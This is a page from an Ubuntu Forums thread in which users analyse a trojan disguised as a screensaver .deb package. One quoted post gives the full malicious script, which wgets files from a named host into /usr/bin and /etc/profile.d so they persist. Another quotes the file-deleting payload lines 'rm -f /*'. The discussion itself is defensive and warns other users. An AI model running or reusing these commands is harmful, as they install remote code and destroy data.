Page 11 of 15 FirstFirst ... 910111213 ... LastLast
Results 101 to 110 of 142

Thread: YOU THERE!! Malicios script installed as a DEB, please read!

  1. #101
    Join Date
    Jun 2007
    Location
    Kent, UK
    Beans
    214
    Distro
    Ubuntu

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by fromthehill View Post
    then they just add a gksu or something to the script
    most people don't know inside what kind of package a screensaver should be.
    well, true. It's tricky when people are given so much freedom to put whatever they want into packages.

    However, I still think we need to enhance package management to recognize different users more.

    Not everything should be installed as root, IMO

    Quote Originally Posted by tinivole View Post
    Quite contrary, this is not a hole in the system. This is social engineering applied outside of lab testing.
    It is no surprise that people fell for the cookie.

    But as much as we teach you not to download anything from untrusted sites - people will fall for the "Linux Security" propaganda and get complacent.

    Linux is a strong system not because of the system being "built ground up for security", that is but a small piece in the puzzle. Linux is a strong system because it's users are generally "in the know" about threats and prevention.
    I don't agree at all, Linux IS more secure from the ground-up due to it's strict permissions system, not opening too many ports, rapid open source development and probably other things that I am not aware of
    Last edited by hoppipolla; December 9th, 2009 at 12:01 AM.
    Registered Ubuntu user #28880

  2. #102
    Join Date
    Dec 2007
    Location
    Gainesville, Florida
    Beans
    Hidden!
    Distro
    Xubuntu 12.04 Precise Pangolin

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Has anyone tried to contact Interserver, Inc.?

    abuse@trouble-free.net

    they host 05748.t35.com

  3. #103
    Join Date
    Nov 2007
    Location
    England
    Beans
    733
    Distro
    Ubuntu 11.10 Oneiric Ocelot

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by tinivole View Post
    This is neither end of days - nor Linux being hacked. Think of this as a warning to all Debian system users who download and run untrusted files and installers on their production machines.

    99% of other Linux users will carry on their everyday life not knowing this ever happened...
    I know!! I am aware of what the script does/did. Its the "spin" i'm talking about, not the fact that this script which wont propagate against
    Want an alternative to 99% of Windows applications?
    http://www.osalt.com/

    "Dude, real programmers compile" - Plato 428BC

  4. #104
    Join Date
    Nov 2006
    Location
    Belgium
    Beans
    3,008
    Distro
    Ubuntu 10.04 Lucid Lynx

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by NoaHall View Post
    As far as I can tell, the command there was
    Code:
     sudo rm -f /*
    (need tinvole to confirm this)

    This wouldn't have caused damage - you need a -r there too to delete folders.
    10 minutes ago it said:
    Code:
     rm -f /*.*
    echo "You see this? It's changed, before it was set to ping?"
    As someone pointed out, the trojan downloads this file at every run (ie every logon) so the payload can be updated indefinitely.
    i.e. it looks as if this kid is experimenting with payloads and has some trouble getting the syntax right.
    Or it's a proof of concept - assuming the (ineffective) command will be shown together with the echo msg - something like "see what I could do" - although you'd have to run that as root to do real damage

  5. #105
    Join Date
    Jun 2007
    Beans
    346

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by conorsulli View Post
    Hello guys Im going to make this breef

    I have installed a deb from a site claiming to be an Screensaver however it looked dodgy however I proceeded.

    after I looked into the source I found MYSTERIOS ACTIVITY FOR WHAT SHOULD BE A SCREENSAVER... IS THIS REQUIRED? (below)
    (also no screensaver was ever shown in gnome-screensaver)

    #!/bin/sh
    cd /usr/bin/
    rm Auto.bash
    sleep 1
    wget http://05748.t35.com/Bots/Auto.bash
    chmod 777 Auto.bash
    echo -----------------
    cd /etc/profile.d/
    rm gnome.sh
    sleep 1
    wget http://05748.t35.com/Bots/gnome.sh
    chmod 777 gnome.sh
    echo -----------------
    clear
    exit


    Im no expert but this looks just wrong!!

    I have removed the package however I i doubt this has done much good...

    Please help, comments exist from other users who have downloaded this file not understanding why their screensaver did not show up and probably left the file installed.

    This all just litterally happened in the last few minutes and im affraid to reboot my computer.. should I reinstall my gnome packages?

    Or was I just being paranoid? Im thinking I should contact the other users who have downloaded the file and request the file be pulled if it is in fact some attack...

    Sorry for sounding strange, Just trying to fix this A.S.A.P.

    Thank you for any suggestions.
    that is not for a screensaver

    that is for a irc bot

  6. #106
    NoaHall is offline May the Ubuntu Be With You!
    Join Date
    Mar 2009
    Beans
    1,562
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by EnGorDiaz View Post
    that is not for a screensaver

    that is for a irc bot
    No it's not, but hey. We've solved it.

    koenn - Yeah, from the quote on the website too, I don't think it was meant to cause damage yet - just a attempt - or maybe when he found he was discovered, he tried to make it just look like a attempt.

  7. #107
    Join Date
    Dec 2009
    Beans
    114
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by conorsulli View Post
    Thanks very much for this.
    Can be run without super yes?
    Yeah, strangely enough "ps -A" shows all processes even if they aren't yours.

    It won't use any resources. You can leave it on all day, etc.
    (\ /)
    (O.o)
    (> <)
    This is Bunny. Copy Bunny into your signature to help him on his way to world domination.

  8. #108
    Join Date
    Nov 2007
    Location
    Salisbury, UK
    Beans
    70
    Distro
    Ubuntu 13.10 Saucy Salamander

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by tinivole View Post
    We have a "Security Discussions" sub-forum.

    Although, no one really ever reads the stickies in there.

    Ubuntu Security. Written by bodhi.zazen

    Regards

    Which says to me this method of getting the message across is not working... I'm not saying I know the answer but maybe this does need to be examined by those that package Ubuntu.....

  9. #109
    Join Date
    Jun 2007
    Location
    Porirua, New Zealand
    Beans
    Hidden!
    Distro
    Ubuntu

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Just looked at the website. There've been changes apparently.
    Attached Images Attached Images
    Forum DOs and DON'Ts
    Never assume that information you find using a search engine is up-to-date.

  10. #110
    NoaHall is offline May the Ubuntu Be With You!
    Join Date
    Mar 2009
    Beans
    1,562
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by lisati View Post
    Just looked at the website. There've been changes apparently.
    Well, maybe he's decided to go back to where ever he came from. Hopefully.

    Most likely though, he's deleted his account there and made a new one else where.

Page 11 of 15 FirstFirst ... 910111213 ... LastLast

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •